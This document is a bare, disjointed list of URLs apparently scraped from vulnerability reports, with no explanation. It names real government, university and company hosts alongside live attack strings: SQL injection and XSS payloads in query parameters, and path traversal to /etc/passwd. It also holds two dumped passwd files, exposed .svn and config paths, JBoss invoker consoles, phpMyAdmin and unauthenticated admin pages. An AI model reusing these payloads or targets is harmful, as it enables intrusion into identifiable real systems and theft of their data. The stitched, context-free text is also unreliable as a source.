http://121.17.2.52/DocumentPrint/LandDisputes.aspx?id= http://61.186.154.210:8088/DocumentPrint/LandDisputes.aspx?id= http://commerceb2b.shopex123.com http://commerceb2b.shopex123.com/shopadmin http://commerceb2b.shopex123.com/home/download/cs99.php show.test.yoho.cn/admin/default/yoho http://www.ly.com/dujia/AjaxCallNew.aspx?type=GetNewVisaCountryUrl1&cityname=%E6%97%A5%E6%9C%AC&citytype=314&locality=6&iid=0.9027713068830946 http://api.open.baidu.com/pae/channel/data/asyncqury?appid=4064&content=%20&cover=1&sender=%20&receiver=%20&extratext=4064 http://110.98.98.66/bin/PLATFORMWEB.html http://110.98.98.66/invoker/EJBInvokerServlet http://www.88box.com/service/ http://www.cnpc.com.cn:80/ www.cnpc.com.cn http://jianzhan.admin5.com/1.txt http://59.108.66.229:8083/Questionnaire/login.action http://59.108.66.229:8083/Questionnaire/fz.jsp encap:Ethernet CB:76:8C:A4 addr:172.20.1.47 Bcast:172.20.7.255 Mask:255.255.248.0 cbff:fe76:8ca4/64 Scope:Link MTU:1500 packets:139548155 packets:13630728 txqueuelen:1000 http://zb.zol.com.cn/equip.php?userid=hanggle&type=1%20and%201=2%20union%20select%201,2,user%28%29,database%28%29,version%28%29,6,7,8-- http://www.jzswsfwdt.gov.cn/install http://www.airmacau.com.tw/airshopping/eshopping_intro.asp?item=53008871 http://www.airmacau.com.tw/airshopping/eshopping_intro.asp?item=53008871 http://www.airmacau.com.tw/airshopping/eshopping_intro.asp?item=53008871 http://www.strongsoft.net/ http://www.strongsoft.net/ ldfxb.com/public/DataAccess/GeneralModule/GetFeatureInfo.ashx?SqlKey=Map_S_GetReseFeatureInfo_ZWP&STCD=rs048&dateForAjax=659 yj.yywater.gov.cn/public/DataAccess/GeneralModule/GetFeatureInfo.ashx?SqlKey=Map_S_GetReseFeatureInfo_ZWP&STCD=rs048&dateForAjax=659 shzh.wlfx.gov.cn/public/DataAccess/GeneralModule/GetFeatureInfo.ashx?SqlKey=Map_S_GetReseFeatureInfo_ZWP&STCD=rs048&dateForAjax=659 shzh.dqwater.gov.cn/public/DataAccess/GeneralModule/GetFeatureInfo.ashx?SqlKey=Map_S_GetReseFeatureInfo_ZWP&STCD=rs048&dateForAjax=659 http://221.1.104.11:8011/ContractApply/TransferApplyMain.aspx http://221.2.171.59:8300/ContractApply/TransferApplyMain.aspx http://demo.inongyou.cn/ContractApply/TransferApplyMain.aspx http://rctdlz.cn/ContractApply/TransferApplyMain.aspx http://60.2.214.118:8088/ContractApply/TransferApplyMain.aspx http://121.17.2.52/ContractApply/TransferApplyMain.aspx http://61.186.154.210:8088/ContractApply/TransferApplyMain.aspx http://web.do1.com.cn:8888/dbase/admin/loginJsp.action https://**.**.**/admin/ https://**.**.**/svn/src/web/trunk/eccomc http://code.taobao.org/p/baiyipublish/src/trunk/application/config/database.php http://shzh.wlfx.gov.cn/Response/RespCourseList.aspx http://218.86.6.48:3505/Response/RespCourseList.aspx http://yj.yywater.gov.cn/Response/RespCourseList.aspx http://222.216.218.28:8088/Response/RespCourseList.aspx http://219.159.102.99:8088/Response/RespCourseList.aspx http://218.86.96.98:3505/Response/RespCourseList.aspx http://111.12.51.221:8088/Response/RespCourseList.aspx http://222.242.107.62:4000//Response/RespCourseList.aspx http://fxb.lucheng.gov.cn/Response/RespCourseList.aspx http://183.233.205.85:9001/Response/RespCourseList.aspx http://222.83.214.58:8088/Response/RespCourseList.aspx http://219.159.239.96:8088/Response/RespCourseList.aspx http://222.83.214.58:8088/UpLoadFile/RespCourse/201502/20150214154619068.aspx http://111.12.51.221:8088/UpLoadFile/RespCourse/201502/20150214160656203.aspx http://222.216.218.28:8088/UpLoadFile/RespCourse/201502/20150216092014020.aspx http://219.159.102.99:8088/UpLoadFile/RespCourse/201502/20150216092105373.aspx http://**.**.**/Login.aspx_ http://**.**.**/Login.aspx http://**.**.**/Login.aspx http://**.**.**/tabled.phpbh=1&lx=wsxf&pass=1 http://wooyun.org/bugs/wooyun-2010-075251 http://60.2.249.165/ http://www.enet98.com/support3-detail.aspx?id=594 http://www.enet98.com/admin/login.aspx http://www.enet98.com/ckeditor/ckfinder/ckfinder.html http://www.fudian-bank.com/www.fudian-bank.com.rar http://www.sha-steel.com/admin/Main.aspx http://61.153.41.122:7001 http://61.153.41.122:7001/Logon.jsp http://softdl.360tpcdn.com/ http://agd.p.360.cn/ http://210.51.19.141/programupload/user/login http://114.251.243.18/hhzp/pc.action?dqzpzd=101 http://passport.mop.com/ http://hi.mop.com/space/1 http://hi.mop.com/space/ https://114.251.243.4/web/login.html http://bbs.zmifi.com/ http://218.69.249.226/login.aspx URL:http://www.cycb.com/phone.do?method=index&fkid=1 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash named:x:25:25:Named:/var/named:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin http://www.cycb.com/phone.do?method=index&fkid=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert%280x000A39%29%3C/scRipt%3E inurl:preview inurl:gov.cn http://preview.alashan.mca.gov.cn/article/lyzx/index.shtml?siteid=alashan http://114.251.242.196/ http://democn.b2b-builder.com/main.php?m=tg&s=admin_orderadder&id=3&type=edit 2.democn.b2b-builder.com/?m=tg&s=order&id=10 http://cn.shop-builder.cn/main.php?m=member&s=admin_orderadder&id=101&type=edit http://cn.shop-builder.cn/?m=product&s=shop_order http://democn.mall-builder.com/main.php?m=member&s=admin_orderadder&id=313&type=edit 6.democn.mall-builder.com/?m=product&s=confirm_order http://www.yaya888.com/ajax.js.php?sid=1&pid=5 http://211.138.14.10/fore/index.do http://218.249.38.215/user_center/,来到中关村展陈管理系统页面,如图所示: http://218.249.38.215/proj_man/Article/articleDetail/articleid/20,打开后测试下目录安全性,发现系统使用的是Thinkphp,如图所示: http://blog.jinku.com/batch.common.php?action=mo http://ekp.zt17.cn/ http://ekp.zt17.cn/names.nsf pass:v***** http://democn.mall-builder.com/main.php?m=member&s=admin_orderadder&id=333&type=edit http://ser.cneec.bj.cn:8084/warroom/dw/custormer_complain/new.action http://210.76.125.50:8080/datainfo/login.do.jsp http://210.76.125.50:8080/jzzj/xcpt/xwbd_1_noLogin.jsp?id=1384 http://www.snjrsj.gov.cn/hbwz/sms/login.jsp www.snjrsj.gov.cn/hbwzweb/html/hdjl/zxzx/zxzx_ckhf.shtml?zxlb=03 http://121.15.210.251/Account/Login URL:http://121.15.210.251/Account/Login URL:http://121.15.210.251/Initialize/GetSuppliers?SupplierCategory=&Name=123&pageIndex=1&pageSize=10&sortField=CreateAt&sortDirection=0&_=1424075327327 http://121.15.210.251/Initialize/GetSuppliers?SupplierCategory=&Name=123&pageIndex=1&pageSize=10&sortField=CreateAt&sortDirection=0&_=1424075327327 http://121.15.210.251/Initialize/Supplier https://github.com/kongzhidea/kongzhidea/blob/b33e58a105189a33191fc09d8efe5332163c3f2e/xweb/.svn/pristine/d9/d97e9f1a893a694f0e64da8680845f97c15b2381.svn-base http://121.15.210.251/Account/Login http://sjz.lanfw.com/zt/2009pingxuan/gs/update.php?id=711 http://agent.shenzhen.zlhome.com/iahouseinfos/agentdata http://jrappgw.jd.com/resources/downloadApp.html android:minSdkVersion="10 android:targetSdkVersion="15 http://222.82.208.13:8089/Client/login.action http://218.30.22.96/moble/kuaye/save.php root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin mysql:x:500:500::/home/mysql:/sbin/nologin www:x:501:501::/home/www:/sbin/nologin nagios:x:502:502::/home/nagios:/bin/bash cacti:x:503:504::/home/cacti:/bin/bash nginx:x:504:505::/home/nginx:/sbin/nologin http://news.cb.com.cn/index.php?m=content&c=index&a=lists&catid=58&issue=2098存在注入漏洞 http://www.me.ncu.edu.tw/faculty/faculty-more.php?id=30 http://help.u17.com/index.php http://help.u17.com/index.php?search-fulltext-title-\%22%3E%3Cscript%3Ealert%28%2Fwooyun%2F%29%3C%2Fscript%3E--all-0-within-time-desc-1 http://wap.cjmsa.gov.cn/webui/web/HSZX/Info.aspx?id=1 http://58.18.212.99:9084/tlwsyy/driverAction!toDriverlogin.action http://www.ahbb-l-tax.gov.cn/cms/cms/search.do http://bbs.dongting.com/home.php?mod=space&uid=1164 http://bbs.dongting.com/home.php?mod=space&username=fai http://bbs.uc.cn/ http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx http://www.ot-hs.com/index1.asp http://183.62.56.27:99/UIFrameWork/login.aspx http://219.139.39.120:81/OT.OA.WEB/UIFrameWork/login.aspx http://hbjtzdgc.com/UIFrameWork/login.aspx http://219.138.90.130:82/UIFrameWork/login.aspx http://222.42.46.151/OT.OA.WEB/UIFrameWork/login.aspx http://222.42.46.201:81/UIFrameWork/login.aspx http://www.jiangnangs.com:82/UIFrameWork/login.aspx http://219.139.32.247:8002/UIFrameWork/login.aspx http://61.183.60.152:82/UIFrameWork/login.aspx http://218.16.138.249:81/UIFrameWork/login.aspx Hello:Lofter http://www.wuyishan.gov.cn/leaveword/default.aspx?hotflag=1 http://www.wuyishan.gov.cn/info/Default.aspx?comtype=13 http://www.gla.uestc.edu.cn/chinese/conference.php?id=7&act=list http://www.gla.uestc.edu.cn/chinese/conference.php?id=7&act=list http://mail.rails.cn/nsmail/index.php http://www.bxrc.org.cn/test.txt http://pic.womaiapp.com/ http://www.cofcoyoucai.com/user/editAddress.html?id=135 http://www.cofcoyoucai.com/user/editAddress.html?id=133 http://www.nongyou.com.cn/ http://221.2.156.181:8100/jubao/jubaoview.aspx?id=1 http://221.2.171.59:8000/jubao/jubaoview.aspx?id=1 http://222.135.76.147:8100/jubao/jubaoview.aspx?id=1 http://222.135.109.70:8100/jubao/jubaoview.aspx?id=1 http://61.133.119.187:8089/jubao/jubaoview.aspx?id=1 http://60.217.72.17:8000/jubao/jubaoview.aspx?id=1 http://218.56.40.229:8060/jubao/jubaoview.aspx?id=1 http://218.56.40.229:8060/jubao/jubaoview.aspx?id=1 http://60.217.72.17:8000/jubao/jubaoview.aspx?id=1 http://www.clcn.net.cn/modules/guide/index.php?page_id=2 http://www.clcn.net.cn/modules/resources_tab/index.php?page_id=1 http://www.clcn.net.cn/modules/downloads/detail.php?downloads_id=1 http://www.clcn.net.cn/.svn/entries http://www.clcn.net.cn/.svn/entries http://www.clcn.net.cn/modules/announcement/.svn/entries http://www.clcn.net.cn/modules/xoopsfaq/.svn/entries http://www.clcn.net.cn/modules/information/.svn/entries http://www.clcn.net.cn/modules/resource_news/.svn/entries http://www.clcn.net.cn/modules/support/.svn/entries http://www.clcn.net.cn/special/cla/.svn/entries http://www.clcn.net.cn/modules/resources/.svn/entries http://www.clcn.net.cn/modules/theme_news/.svn/entries http://www.clcn.net.cn/modules/recommend/.svn/entries http://www.clcn.net.cn/yixuan/yixuan_cloud/.svn/entries http://www.clcn.net.cn/modules/.svn/entries http://www.clcn.net.cn/modules/event_video/.svn/entries http://www.clcn.net.cn/modules/guide/.svn/entries http://www.clcn.net.cn/modules/events/.svn/entries http://www.clcn.net.cn/special/beijing/.svn/entries http://www.clcn.net.cn/modules/resources_tab/.svn/entries http://www.clcn.net.cn/special/community/.svn/entries http://www.clcn.net.cn/modules/downloads/.svn/entries http://www.clcn.net.cn/special/exhibition/.svn/entries http://www.clcn.net.cn/modules/theme/.svn/entries http://www.clcn.net.cn/special/mlibrary/.svn/entries http://www.clcn.net.cn/special/exhibition/links/HZ/.svn/entries http://www.clcn.net.cn/special/exhibition/links/10.1/.svn/entries http://www.clcn.net.cn/special/exhibition/links/10.1/hist/.svn/entries http://www.clcn.net.cn/special/exhibition/links/10.1/mzd/.svn/entries http://www.clcn.net.cn/special/exhibition/links/10.1/lit/.svn/entries http://www.clcn.net.cn/special/exhibition/links/10.1/press/.svn/entries http://www.clcn.net.cn/special/exhibition/links/10.1/mag/.svn/entries http://www.clcn.net.cn/special/exhibition/links/shumu/.svn/entries http://www.clcn.net.cn/special/exhibition/links/duanwu/.svn/entries http://www.clcn.net.cn/special/exhibition/links/091027/.svn/entries http://www.clcn.net.cn/special/exhibition/links/ditan/.svn/entries http://www.clcn.net.cn/special/exhibition/links/10.1/news/.svn/entries http://www.clcn.net.cn/special/exhibition/links/10.1/max/.svn/entries http://www.clcn.net.cn/special/exhibition/links/10.1/life/.svn/entries http://shenzhen.qfang.com/sale/3146126 xss.name/Cx66AD http://58.18.89.226/ inurl:approve/common/ inurl:indexNew.action http://61.145.126.119/WebProXZ/app/entp/guide http://61.145.126.119/WebProXZ/approve/common/codeTree/indexNew.action http://121.10.6.231/app/entp/approve http://121.10.6.231/approve/common/codeTree/indexNew.action http://wzzxbs.mofcom.gov.cn/app/entp/approve http://wzzxbs.mofcom.gov.cn/approve/common/codeTree/indexNew.action http://222.240.202.23:8080/WebProHNFI/ http://222.240.202.23:8080/WebProHNFI/approve/common/codeTree/indexNew.action http://www.cofcoyoucai.com/search.html?key=111 http://im.koudaiyouhui.com:8082/shop/topic/topicAction!show.action http://**.**.**/seeyon/index.jsp http://**.**.**/ pss.uestc.edu.cn/tasi/admin/convert/convert.asp?action=querylist http://baoxian.cntaiping.com/b2b2e/login/toAdminLogin.action http://180.153.24.6:8180/invoker/JMXInvokerServlet http://180.153.24.6:8180/invoker/EJBInvokerHAServlet http://www.exploit-db.com/exploits/28713/ http://www.exploit-db.com/exploits/21080/ http://www.hqark.cn/WeiXin/ http://www.hqark.cn/WeiXin/.svn/ http://www.hqark.cn/WeiXin/.svn/pristine/5a/5a3f7454be66d5d09af3c6cdfe81226031900c78.svn-base http://www.hqark.cn/WeiXin/ThinkPHP/ThinkPHP.php http://www.nongyou.com.cn/ http://61.133.119.187:8091/newSymSum/cwjdqk.aspx?CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://222.135.76.147:8200/newSymSum/cwjdqk.aspx?CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://222.135.127.190:7200/newSymSum/cwjdqk.aspx?CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://221.2.149.47:8200/newSymSum/cwjdqk.aspx?CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://218.59.205.41:8053/newSymSum/cwjdqk.aspx?CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://jwh.tanljgzx.gov.cn/newSymSum/cwjdqk.aspx?CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://221.2.171.59:8200/newSymSum/cwjdqk.aspx?CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://218.56.159.98:8001/newSymSum/cwjdqk.aspx?CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://123.134.189.60:8016/newSymSum/cwjdqk.aspx?CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://123.134.189.60:8016/newSymSum/cwjdqk.aspx?CountryName=%E6%9D%A8%E5%8C%97%E6%9D%91 http://www.nongyou.com.cn/ http://61.133.119.187:8091/symItemManage/ItemFifth.aspx?id=1 http://222.135.76.147:8200/symItemManage/ItemFifth.aspx?id=1 http://222.135.127.190:7200/symItemManage/ItemFifth.aspx?id=1 http://221.2.149.47:8200/symItemManage/ItemFifth.aspx?id=1 http://218.59.205.41:8053/symItemManage/ItemFifth.aspx?id=1 http://jwh.tanljgzx.gov.cn/symItemManage/ItemFifth.aspx?id=1 http://221.2.171.59:8200/symItemManage/ItemFifth.aspx?id=1 http://218.56.159.98:8001/symItemManage/ItemFifth.aspx?id=1 http://123.134.189.60:8016/symItemManage/ItemFifth.aspx?id=1 http://123.134.189.60:8016/symItemManage/ItemFifth.aspx?id=1 http://**.**.**/product_290.html http://www.nongyou.com.cn/ http://221.2.156.181:8100/jubao/StatisticalAnalysis.aspx?pid=153 http://221.2.171.59:8000/jubao/StatisticalAnalysis.aspx?pid=153 http://222.135.76.147:8100/jubao/StatisticalAnalysis.aspx?pid=153 http://222.135.109.70:8100/jubao/StatisticalAnalysis.aspx?pid=153 http://61.133.119.187:8089/jubao/StatisticalAnalysis.aspx?pid=153 http://60.217.72.17:8000/jubao/StatisticalAnalysis.aspx?pid=153 http://111.17.169.210:801/jubao/StatisticalAnalysis.aspx?pid=1429 http://111.17.169.210:801/jubao/StatisticalAnalysis.aspx?pid=1429 http://60.217.72.17:8000/jubao/StatisticalAnalysis.aspx?pid=153 http://116.199.115.230/index.php http://t.gztv.com/index.php http://116.199.115.228/ http://www.nongyou.com.cn/ http://61.133.119.187:8091/symItemManage/ItemFirst.aspx?id=1 http://222.135.76.147:8200/symItemManage/ItemFirst.aspx?id=1 http://222.135.127.190:7200/symItemManage/ItemFirst.aspx?id=1 http://221.2.149.47:8200/symItemManage/ItemFirst.aspx?id=1 http://218.59.205.41:8053/symItemManage/ItemFirst.aspx?id=1 http://jwh.tanljgzx.gov.cn/symItemManage/ItemFirst.aspx?id=1 http://221.2.171.59:8200/symItemManage/ItemFirst.aspx?id=1 http://218.56.159.98:8001/symItemManage/ItemFirst.aspx?id=1 http://123.134.189.60:8016/symItemManage/ItemFirst.aspx?id=1 http://123.134.189.60:8016/symItemManage/ItemFirst.aspx?id=1 http://218.56.159.98:8001/symItemManage/ItemFirst.aspx?id=1 http://ask.sdo.com/userinfo/MyReview?gameNo=70 http://ask.sdo.com/common/unjudgelist?gameno=89 http://ask.sdo.com/common/dqarticlelist?gameno=89 http://ask.sdo.com/Common/MainArticleList?gameno=88 http://mail.xxx.com.cn/src/read_file.php?signature=../../../../../../../etc/passwd http://mail.xxx.com.cn/src/read_file.php?uploadimage=../../../../../../../../../../etc/passwd http://www.qzgaj.gov.cn/1.rar,下载下来看了下 http://www.qzgaj.gov.cn/qzgaj123/ http://eta.travelsky.com/sale/anony/browser!download.do www.tljt.gov.cn/zfxxgk/show.asp?id=327 http://test.baozoumanhua.com:9200/_search?pretty http://112.91.118.233:8080/phpmyadmin http://112.65.254.133:8080/jmx-console/ http://demo.phpstcms.com http://www.chinacath.net/ http://www.realdao.cn/music_rl/ http://www.yululaw.com/ http://www.anoldcd.com/ http://music.hmr12.com/ http://171.92.207.106/ http://172.30.106.10/selfservice/public/login.action http://www.nongyou.com.cn/ http://61.133.119.187:8091/symItemManage/ItemThird.aspx?id=1 http://222.135.76.147:8200/symItemManage/ItemThird.aspx?id=1 http://222.135.127.190:7200/symItemManage/ItemThird.aspx?id=1 http://221.2.149.47:8200/symItemManage/ItemThird.aspx?id=1 http://218.59.205.41:8053/symItemManage/ItemThird.aspx?id=1 http://jwh.tanljgzx.gov.cn/symItemManage/ItemThird.aspx?id=1 http://221.2.171.59:8200/symItemManage/ItemThird.aspx?id=1 http://218.56.159.98:8001/symItemManage/ItemThird.aspx?id=1 http://123.134.189.60:8016/symItemManage/ItemThird.aspx?id=1 http://123.134.189.60:8016/symItemManage/ItemThird.aspx?id=1 http://218.56.159.98:8001/symItemManage/ItemThird.aspx?id=1 http://60.213.185.51:9080/wscgs/login.do http://www.lcwscgs.com/wscgs/login.do http://60.211.179.22:9080/wscgs/login.do http://58.59.39.43:9080/wscgs/login.do http://cgs.qdpolice.gov.cn:9080/wscgs/login.do http://218.59.228.162/wscgs/login.do http://cgs.ytjj.gov.cn:9061/wscgs/login.do http://www.wfcgs.com:9080/wscgs/login.do http://www.wfcgs.com:9080/wscgs/login.do http://www.bjtel.cn/kode/index.php http://www.bjtel.cn/kode/lib/plugins/adminer/index.php http://**.**.**/LZUM/SelectSystem.aspx http://**.**.**/tower/rbac/login/ http://dmp.op.cig.com.cn/report/area/index?t=1&deep= http://wsbs.sc-n-tax.gov.cn/login.htm http://oa.chinagas.com.cn/ http://**.**.**/managers/login.asp memcached:124.248.32.61:11211 http://58.247.81.182:11001/phpinfo.php http://58.247.81.182:11001/fe/phpinfo.php http://58.247.81.182:11001 http://58.247.81.182:3000/dataSource/index http://220.169.248.228:8080/system/manager/login.do https://xxx/commonplugin/Download.php?reqfile=文件名 http://www.wandafilm.com/trade/movie_times.jsp?filmId=--%3E%27%22%3E%3CH1%3E http://localhost:8888/xssplatform/ClHU6C?1424493282 Service2.asmx/GetHomePageData http://www.glqxj.com/admin/login.asp img12.jiuxian.com//upheader/temp/97236b81569c4e538761d798510e878a.html http://221.1.104.11:8011/ContractApply/FamilyApplyView.aspx?ID= http://221.2.171.59:8300/ContractApply/FamilyApplyView.aspx?ID= http://demo.inongyou.cn/ContractApply/FamilyApplyView.aspx?ID= http://rctdlz.cn/ContractApply/FamilyApplyView.aspx?ID= http://60.2.214.118:8088/ContractApply/FamilyApplyView.aspx?ID= http://121.17.2.52/ContractApply/FamilyApplyView.aspx?ID= http://61.186.154.210:8088/ContractApply/FamilyApplyView.aspx?ID= http://oa.chinagas.com.cn/checkuser.aspx?uname=s http://oa.chinagas.com.cn/ListNews.aspx?type=3 http://oa.chinagas.com.cn/New/Frame_Ri.aspx?id=9034 http://**.**.**/LQL_OA/login.aspx http://tms.ijml.net/retail.jsp http://www.snjrsj.gov.cn/hbwzweb/html/hdjl/zxzx/zxzx_ckhf.shtml?zxlb=03 http://210.30.232.71/KaoShiAnPai.aspx?Bm=15 http://210.30.232.71/admin/login.aspx http://**.**.**/usermanager/UserMng.aspx http://www.langfly.com/topicman/SiteUser.do?backurl=&siteid=&siteuser.username=&siteuser.order=&pagesize=50&offset=0 http://hip.haday.cn:8188/HIP/main/login.do http://apt.feng.com/ http://apt.feng.com/index.php?r=upload/modify&id=54e811e50e1d15ff2a8b485e&cyuid=9511058 http://apt.feng.com/read-52fd8ad6b704b265768b469d.html http://59.173.0.46:9999/ http://www.yiban.cn/project/project.tar.gz http://m.zhenai.com/profile/qq/index.html?8oHP#www.5173.com-20150204.shtml http://m.zhenai.com/profile/qq/index.html http://www.w3.org/1999/xhtml http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.0.min.js http://siteapp.baidu.com/site/?host=wooyun.org https://account.bilibili.com/login?appkey=243901e627b808e5&api=http%3A%2F%2Fh.bilibili.com%2Flogin%3Fact%3Dcallback%26do%3Dlogin%26go%3D&sign=707f39fc8b98dfad3b1535ddf48a5696 https://vpn.baoan.edu.cn http://jw.hrbeu.edu.cn/QHDBCONFIG.INI就会看到数据库配置信息以及加密后的账号密码等。 https://220.178.52.157 http://www.kuas.edu.tw/bin/home.php http://www2.ce.kuas.edu.tw/manage/ http://www.acce.kuas.edu.tw/admin/app/cert.asp http://3q.kuas.edu.tw/login.php http://www.che.kuas.edu.tw/admin/ http://www.lib.kuas.edu.tw/news_full.asp?nid=1684 http://2015gzbzr.hdpx.webtrn.cn https://222.85.86.119/por/login_psw.csp?right=0&point=-27115& http://bbs.21its.com/ForumInfo.aspx?id=2013112615424300001 http://zhao.07073.com/searchList?gname=test http://wenku.baidu.com/view/7792258e33d4b14e85246872.html https://202.100.241.24 http://www.haikou.gov.cn/root9/0107/201411/t20141121_810912.htm www.szkg.gov.cn/TaxiDriver/config.aspx www.szkg.gov.cn/kaoshi/config.aspx http://mall.bg68.com/httphandler/getdata.ashx http://mall.hicay.com/httphandler/getdata.ashx http://www.szatlas.com.cn/httphandler/getdata.ashx http://w16.cxecs.com/httphandler/getdata.ashx http://www.gongrenmei.com/httphandler/getdata.ashx http://www.damall.net/httphandler/getdata.ashx http://www.whjdb.gov.cn/index.php?s=admin&c=login http://cms.acfic.org.cn/seeyon/index.jsp http://crm3.byd.com.cn/login!login.action http://apt.feng.com/ http://m.wifenxiao.com/Item/detail/id/11849/sid/1005/pid/0.html http://www.jdair.net/b2c/frontend/users/modifyinfo/resetPassword.jsp http://cas.cdvcloud.com/ http://mail.163.com www.hosp1.ac.cn/wyyy/web/ksts/lcks.aspx?ksmc=%C9%F1%BE%AD%C4%DA%D2%BB%BF%C6 http://www.hneao.cn/gkkw/login.action http://ssqj.qiye.ikanshu.cn/ URL:http://hyk.fh21.com.cn:80/index.php?a=getNewAskList&c=index&m=assay POST:cache_type=2&id=1&is_cache=1 URL:http://hospital.fh21.com.cn/index.php?a=link_date http://zfcg.tsinfo.com.cn/bs_show.asp?d_ID=27 http://sms-service.shopex.cn/index.php?certificate_id= http://www.house5.cn/uploadfile/avatar/1/1/193/180x180.jpg URL:http://test.fh21.com.cn:80//index.php?a=zhun&c=in url:http://ssk.fh21.com.cn/index.php?a=getNewAskList&c=index&m=operation http://news.liupanshui.fang.com/fck低版本的遍历漏洞 http://www.rzfzb.gov.cn/search.php?keyword=1 http://202.112.118.46/index.html http://202.112.118.46/ywcdwz/zxdt2.jsp?zxdt_id=9 URL:http://m.fh21.com.cn/ypk/category/list?category_id=6 http://health.95081.com/jsp/usercheck/useraction!userlogin.action http://xtoa.lbex.com.cn/Default.aspx http://www.glbus.net:8000/ http://oa.chinagas.com.cn/new/List_Admin.aspx?type=10 http://oa.chinagas.com.cn/new/List_Admin.aspx?type=10 http://dl.xxt.hn.chinamobile.com/talkweb/数据割接(勿删)/20140321割接/红塔/36.txt http://114.255.59.61/ https://vpn.njmu.edu.cn/dana/home/index.cgi http://ms.cga.com.cn/Default.aspx http://item.cga.com.cn/images/propImages/aspx.aspx www.nytjj.gov.cn/showword.asp?id=112763 http://221.2.98.74:6080/icrm/loginManager/userLogin_login.do http://xxx.edu.cn/pages/manager/managerAddNManager.jsp http://ecard.sjtu.edu.cn/pages/manager/managerAddNManager.jsp http://www.ecard.ldu.edu.cn/pages/manager/managerAddNManager.jsp http://ecard.ouc.edu.cn/pages/manager/managerAddNManager.jsp http://ecard.xtu.edu.cn/pages/manager/managerAddNManager.jsp湘潭大学 http://ykt.hzau.edu.cn/pages/manager/managerAddNManager.jsp http://id.gzu.edu.cn/pages/manager/managerAddNManager.jsp 